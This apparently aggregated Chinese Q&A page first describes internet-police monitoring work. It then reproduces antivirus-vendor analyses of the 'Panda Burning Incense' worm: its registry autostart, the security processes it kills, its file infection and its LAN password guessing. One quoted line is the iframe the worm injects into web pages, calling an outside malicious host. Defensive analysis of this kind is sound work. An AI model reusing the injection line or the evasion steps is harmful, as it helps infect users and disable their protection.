網監寫腳本

❶ 協警網監干什麼活

網監就是監視網路情況，發現問題及時報告或處理。
網監工作有專門的設備，對於事先設置好的詞語會及時報警，然後由操作員篩選後向上級報告。報告一般有一個制式的表格，按照內容填寫即可。工作不累，但是值班比較嚴格，不能漏掉情況，還有保密紀律等等。如果作為協警，也可能開始做一些輔助性工作，然後慢慢單獨值班。

❷ 起高手解答!有關病毒的問題~~!!!!!!!!!!!!!!!!!!

很多，到這個網址看你就明白了：http://bk..com/view/697258.htm（網路的）
注:江蘇等地區成為「熊貓燒香」重災區。

熊貓燒香(武漢男生)(尼姆亞)病毒
worm.whBoy.（金山稱）worm.nimaya.（瑞星稱）

病毒別名：熊貓燒香(武漢男生)(尼姆亞)
處理時間：金山2006-12-25 瑞星2007-01-12
威脅級別：★★★★
中文名稱：熊貓燒香(武漢男生)(尼姆亞) 病毒類型：蠕蟲 影響系統：Win 9x/ME,Win 2000/NT,Win XP,Win 2003

我國破獲的國內首例製作計算機病毒的大案

湖北省公安廳12日宣布，根據統一部署，湖北網監在浙江、山東、廣西、天津、廣東、四川、江西、雲南、新疆、河南等地公安機關的配合下，一舉偵破了製作傳播「熊貓燒香」病毒案，抓獲病毒作者李俊（男，25歲，武漢新洲區人），他於2006年10月16日編寫了「熊貓燒香」病毒並在網上廣泛傳播，並且還以自己出售和由他人代賣的方式，在網路上將該病毒銷售給120餘人，非法獲利10萬余元。
其他重要犯罪嫌疑人：雷磊（男，25歲，武漢新洲區人）、王磊（男，22歲，山東威海人）、葉培新（男，21歲，浙江溫州人）、張順（男，23歲，浙江麗水人）、王哲（男，24歲，湖北仙桃人）通過改寫、傳播「熊貓燒香」等病毒，構建「僵屍網路」，通過盜竊各種游戲賬號等方式非法牟利。

病毒行為:
金山分析：

這是一個感染型的蠕蟲病毒,它能感染系統中exe,com,pif,src,html,asp等文件,
它還能中止大量的反病毒軟體進程

1:拷貝文件
病毒運行後,會把自己拷貝到
C:\WINDOWS\System32\Drivers\spoclsv.exe

2:添加註冊表自啟動
病毒會添加自啟動項
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

3:病毒行為
a:每隔1秒
尋找桌面窗口,並關閉窗口標題中含有以下字元的程序
QQKav
QQAV
防火牆
進程
VirusScan
網鏢
殺毒
毒霸
瑞星
江民
黃山IE
超級兔子
優化大師
木馬剋星
木馬清道夫
QQ病毒
注冊表編輯器
系統配置實用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
esteem proces
綠鷹PC
密碼防盜
噬菌體
木馬輔助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戲木馬檢測大師
msctls_statusbar32
pjf(ustc)
IceSword
並使用的鍵盤映射的方法關閉安全軟體IceSword

添加註冊表使自己自啟動
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

並中止系統中以下的進程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
kvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe

b:每隔18秒
點擊病毒作者指定的網頁,並用命令行檢查系統中是否存在共享
共存在的話就運行net share命令關閉admin$共享

c:每隔10秒
下載病毒作者指定的文件,並用命令行檢查系統中是否存在共享
共存在的話就運行net share命令關閉admin$共享

d:每隔6秒
刪除安全軟體在注冊表中的鍵值

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RavTask
KvMonXP
kav
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStartEXE
YLive.exe
yassistse

並修改以下值不顯示隱藏文件
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue -> 0x00

刪除以下服務:
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc

e:感染文件
病毒會感染擴展名為exe,pif,com,src的文件,把自己附加到文件的頭部
並在擴展名為htm,html, asp,php,jsp,aspx的文件中添加一網址,
用戶一但打開了該文件,IE就會不斷的在後台點擊寫入的網址,達到
增加點擊量的目的,但病毒不會感染以下文件夾名中的文件:
WINDOW
Winnt
System Volume Information
Recycled
Windows NT
WindowsUpdate
Windows Media Player
Outlook Express
Internet Explorer
NetMeeting
Common Files
ComPlus Applications
Messenger
InstallShield Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gamin Zone

g:刪除文件
病毒會刪除擴展名為gho的文件,該文件是一系統備份工具GHOST的備份文件
使用戶的系統備份文件丟失.

瑞星最新病毒分析報告：「Nimaya（熊貓燒香）」

這是一個傳染型的DownLoad 使用Delphi編寫

該病毒的主要行為:
一.傳播
1.本地磁碟感染
病毒對系統中所有除了盤符為A,B的磁碟類型為DRIVE_REMOTE,DRIVE_FIXED的磁碟進行
文件遍歷感染注:不感染文件大小超過10485760位元組以上的.
(病毒將不感染如下目錄的文件):
Microsoft Frontpage
Movie Maker
MSN Gamin Zone
Common Files
Windows NT
Recycled
System Volume Information
Documents and Settings
....
(病毒將不感染文件名如下的文件):
setup.exe
NTDETECT.COM

病毒將使用兩類感染方式應對不同後綴的文件名進行感染
1.二進制可執行文件(後綴後為:EXE,SCR,PIF,COM)
將感染目標文件和病毒溶合成一個文件(被感染文件貼在病毒文件尾部)完成感染.

2.腳本類(後綴名為:htm,html,asp,php,jsp,aspx)
在這些腳本文件尾加上如下鏈接(下邊的頁面存在安全漏洞):
<iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>
在感染時會刪除這些磁碟上的後綴名為.GHO

2.生成autorun.inf
病毒建立一個計時器以,6秒為周期在磁碟的根目錄下生成
setup.exe(病毒本身) autorun.inf 並利用AutoRun Open關聯
使病毒在用戶點擊被感染磁碟時能被自動運行.

3.區域網傳播
病毒生成隨機個區域網傳播線程實現如下的傳播方式:
當病毒發現能成功聯接攻擊目標的139或445埠後,將使用內置的一個用戶列表及密碼字典
進行聯接.(猜測被攻擊端的密碼)當成功的聯接上以後將自己復制過去並利用計劃任務
啟動激活病毒.